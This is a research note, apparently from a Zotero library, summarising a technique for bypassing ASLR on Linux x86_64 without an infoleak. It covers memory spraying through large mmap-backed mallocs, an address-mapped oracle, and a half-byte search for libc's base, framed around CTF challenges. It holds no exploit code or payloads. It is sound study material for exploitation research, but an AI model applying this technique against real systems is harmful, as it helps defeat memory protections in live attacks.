Metadata

  • Source
  • Zotero: View Item
  • Type: ComputerProgram
  • Title: nick0ve/how-to-bypass-aslr-on-linux-x86_64,
  • Year: 2024

Annotations

Notes

pwn

Background

  • PIE memory map base address randomization
    • program image: 0x00005500_00000000-0x00005700_00000000 (2TB possible base addresses)
    • heap (usually placed near binary image, but not immediately after)
    • shared libraries: 0x00007f00_00000000-0x00007fff_ffffffff (1TB)
    • stack (usually): 0x00007ffc_00000000-0x00007fff_ffffffff (16GB)
  • interesting linked article on vsyscall and vDSO
  • Usually, ASLR bypass obtaining leaking an address by interacting with the binary (e.g., leak from the stack via format string exploit; simple CTF challenges might even just give an address to you), but it turns out it’s still possible to bypass ASLR without such infoleak.

To achieve ASLR bypass without directly leaking addresses, we need two things:

  • Memory spraying: map memory of a certain size in a given range, achievable via one of two means:
    • Abuse memory leak bugs multiple times until the desired amount of memory has been allocated (and forgotten by the program).
    • Abuse “amplification gadgets” (which are functions that take some data and copy it elsewhere) multiple times.
  • An oracle function isAddrMapped that tells if an address is mmap’ed.

Saelo’s original PoC on ASLR bypass in iOS only needs to memory spray 256MB of data to write a piece data at a known address, but on Linux x86_64, the same technique would require spraying 16TB of data (via malloc) to guarantee breaking ASLR. This is still theoretically possible since mmap isn’t restricted by actual RAM size (i.e., it’s fine as long as we don’t try to write to all pages).

Note that large malloc’s (with size >= MMAP_THRESHOLD, which is usually 128kB on 32-bit systems and 32MB on 64-bit systems; see glibc source) simply uses mmap to create a private annonymous page as opposed to using the heap (specifically, the main arena). Curiously, these mmaps (when called with NULL) allocate pointers in order of decreasing address, which is opposite from small malloc’s. These pointers are in close vicinity to where the libraries are loaded, which can give us some information about the top bytes of the shared library pages—this is where the isAddrMapped oracle comes into play.

We may need to reduce the spray size for realistic targetsand CTF challenges (since they presume presumably have safeguards in place, like the nsjail in the guess_god challenges). This means that we need to do some linear search after the spray. The spray size also determines the maximum step size of the linear search, where we try to find one valid mapped address we sprayed using the oracle. By the intermediate value theorem, we can be assured that the linear search will definitely encounter one mapped address within the spray, as long as the step size is lesser than or equal to the spray size.

Once we find one mapped address, we can try to do a binary search to determine the boundaries of the library mappings like in the original iOS PoC by Saelo, but this is unreliable since there’s a gap between the spray and library. Instead, after reaching the spray point, it is possible to brute force the end of the library mappings half a byte at a time. Say we leaked a mapped address of 0x7faa00000000 via a step size of 4 GiB. We can search 0x7faa00000000-0x7faaffffffff for the last page by starting at the leftmost half-byte of the search space in a descending manner. So if the last page is at 0x7faaedcba000, we’d start checking like so:

xisAddrMapped(x)
0x7faaf0000000False
0x7faae0000000True
0x7faaef000000False
…False
0x7faaed000000True
0x7faaedf00000False
…
…
0x7faaedcbb000False
0x7faaedcba000True (found last page!)

With the end address of the shared library mappings, we can also determine the start the libc since it should be at a constant offset from the end—the offset would be easily obtainable as long as we have the binary, which is the case in CTF challenges.